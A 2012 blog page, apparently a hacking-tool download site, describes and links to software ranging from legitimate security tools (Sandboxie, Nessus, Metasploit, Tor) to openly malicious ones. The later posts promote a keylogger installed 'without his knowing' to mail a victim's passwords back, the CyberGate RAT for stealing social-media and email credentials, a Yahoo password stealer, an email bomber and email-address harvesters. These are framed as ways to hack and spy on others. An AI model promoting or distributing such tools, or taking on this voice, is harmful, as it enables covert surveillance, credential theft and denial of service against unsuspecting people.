Sunday 30 September 2012

SANDBOXIE


Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.


The red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk no sandbox shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.

Download Here

DEEP FREEZE: PROTECT YOUR COMPUTER







Like Sandboxie Deep Freeze helps eliminate computer damage and downtime by making computer configurations indestructible. Once Deep Freeze is installed on a workstation, any changes made to the computer — regardless of whether they are accidental or malicious — are never permanent. Deep Freeze provides immediate immunity from many of the problems that plague computers today—inevitable configuration drift, accidental system misconfiguration, malicious software activity, and incidental system degradation. Deep Freeze ensures computers are absolutely bulletproof, even when users have full access to system software and settings. Users get to enjoy a pristine and unrestricted computing experience, while IT personnel are freed from tedious helpdesk requests, constant system maintenance, and continuous configuration drift.

Download Here

VULNERABILITY ASSESSMENT TOOL : RETINA


Retina's function is to scan all the hosts on a network and report on any vulnerabilities found.

Download here

THE ULTIMATE PENETRATION TESTING TOOL : METASPLOIT







The Metasploit Framework is the open source penetration testing framework with the world's largest database of public, tested exploits. The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing.

Download Here

VULNERABILITY ASSESSMENT TOOL : NESSUS






Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

Download Here


KISMET

Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. 

Download Here

AIRCRACK






Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking like Airsnort, but it is more efficient as it can crack both WEP and WPA passwords. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

Download Here

AIRSNORT




 AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Whereas Aircrack can crack both WEP and WPA passwords, AirSnort has a limitation to cracking only WEP passwords.

Download Here

GHOSTSURF PLATINUM

The ultimate IP address hider and anonymizer which include the following features:

    Encrypts your Internet connection
    Erases all traces of your Web surfing
    Removes aggressive spyware
    Prevents identity theft and credit card fraud
    Secures confidential files
    Eliminates online ads

Also includes Spycatcher which is an excellent anti-spyware.


Download here

IP ANONYMIZER



IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work . It also includes anonymous surfing wizard which guides you to the different parts of the software like online privacy etc.


Download:

HOTSPOT SHIELD

Hotspot Shield protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with Hotspot Shield. Hotspot Shield creates a virtual private network (VPN) between your laptop or iPhone and our Internet gateway. This impenetrable tunnel prevents snoopers, hackers, ISP’s, from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network. Hotspot Shield security application employs the latest VPN technology, and is easy to install and use. 

Download here: 

ANONYMOUS SURFING : TOR

Tor is a very good and free anonymizer program which hides our IP address and protects our privacy. Tor prevents websites from tracking us. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. It is also available as an firefox addon.


PROXY FINDER












Proxy Finder searches the web and find thousands of valid and working proxies in seconds. It can find low, medium and also high anonymity proxies so we can remain anonymous online.

Download

Or

Here






PASSLIST GENERATOR FOR BRUTE



This program generates random password lists for bruteforcing. It generates the passwords at a lightning speed. But as you know, longer the password, little more time it will take. It has a simple interface which asks two simple questions. You just have to answer them and this program will generate the password list in password.txt file in the same directory so that you can use it in a program like Bruteforcer, Brutus etc for bruteforce attack.

Download Here

Or

Here

WINDOWS PASSWORD RECOVERY TOOL


SAMInside recovers Windows NT/2000/XP/2003/Vista user passwords by implementing following types of password attack:

  • Brute-force attack
  • Distributed attack 
  • Mask attack 
  • Dictionary attack 
  • Hybrid attack 
  • Pre-calculated tables attack 
 It includes various types of data imports like LM/NT Hashes, PWDump, LC, LST etc.


Download Here

Or

Here

Saturday 29 September 2012

Havij Advanced SQL Injection


Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users

Download Here

Or

Here

Admin Login Finder


Using the ALF you can find login pages very fast. It tests about 2 urls every second, and does 200 links in less than a minute. Of course it also depends on your internet speed.



Download

Or

Here

Friday 28 September 2012

RapidShare Account Generator, Generate Unlimited Accounts











RapidShare is a website designed to host digital files so other people can download them to their computers. The website calls itself the "Anti-Waiting Company," and when you sign up for their premium service you can get immediate access to downloads. If you don't want to pay for a RapidShare premium account, however, you can still use RapidShare to download files, it just takes a bit longer.

Download

Or

Here

Email address harvesting


The simplest method involves spammers purchasing or trading lists of email addresses from other spammers.
Another common method is the use of special software known as "harvesting bots" or "harvesters", which spider Web pages, postings on Usenet, mailing list archives, internet forums and other online sources to obtain email addresses from public data.
Spammers may also use a form of dictionary attack in order to harvest email addresses, known as a directory harvest attack, where valid email addresses at a specific domain are found by guessing email address using common usernames in email addresses at that domain. For example, trying alan@example.com, alana@example.com, alanb@example.com, etc. and any that are accepted for delivery by the recipient email server, instead of rejected, are added to the list of theoretically valid email addresses for that domain.

Download

Light Email Bomber


  An email bomb is a form of net abuse consisting of sending huge volumes of email to an address in an attempt to overflow the mailbox or overwhelm the server where the email address is hosted in a denial of service attack



Mass mailing consists of sending numerous duplicate mails to the same email address. These types of mail bombs are simple to design but their extreme simplicity means they can be easily detected by spam filters. Email-bombing using mass mailing is also commonly performed as a DDoS attack by employing the use of "zombie"  hierarchical networks of computers compromised by malware and under the attacker's control.

Download

or

Here

Password Generator, Generate Every Type Of Passwords



by this tool you can Genrate upper case , lower case and numeric passwords Generate Every Type Of Passwords unlimited

Download

Or

Here

Thursday 27 September 2012

Facebook like Bot Increase your facbook likes



Its is facbook like tool by this you can unlimited likes on your facebook


you can  Download Here 

Or

Here

Wednesday 26 September 2012

How To Hack a Remote Computer Using Ardamax Keylogger




Ardamax keylogger software which can be used to hack remote computer,Basically Keylogger is a software that is installed on a Victims computer without his knowing, this Keylogger software simply keeps on recording the Key strokes typed by the victim and sends them to your mailbox. No doubt, these keystrokes contain the victim’s Email passwords and All such important information.

Here is tutorial for setup
Tutorial

For Download
Download Here

or

Here

Magic PS v1.5 SE FINAL- Hack Password Yahoo ID or Messenger


Magic PS v1.5 SE FINAL is a free tool to hack any Yahoo mail ID or Yahoo Messenger password. You can use it to get password for any yahoo or messenger ID. Magic PS v1.5 is a Powerfull Password Sender for Yahoo!.


or

Tuesday 25 September 2012

CyberGate RAT - Hacking Facebook, Twitter and Email Id's Passwords




CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed. Using cybergate you can log the victim's passwords and can also get the screen shots of his computer's screen. You can connect o multiple victims in single time. One should no know what is the ip-address of the victims' computers. That is the main benefit. What you have to do is to spread the server file to the vicitms or the people whom you want to infect. Also there is a file manager utility using which you can explore the data of the victim. So, its much exciting, therefore i thought to give a tutorial about it, since it can also be used for constructive purpose i-e you can view the clients of you office or your homies, that what are they doing at computer. Rather they are sincere or not.


Download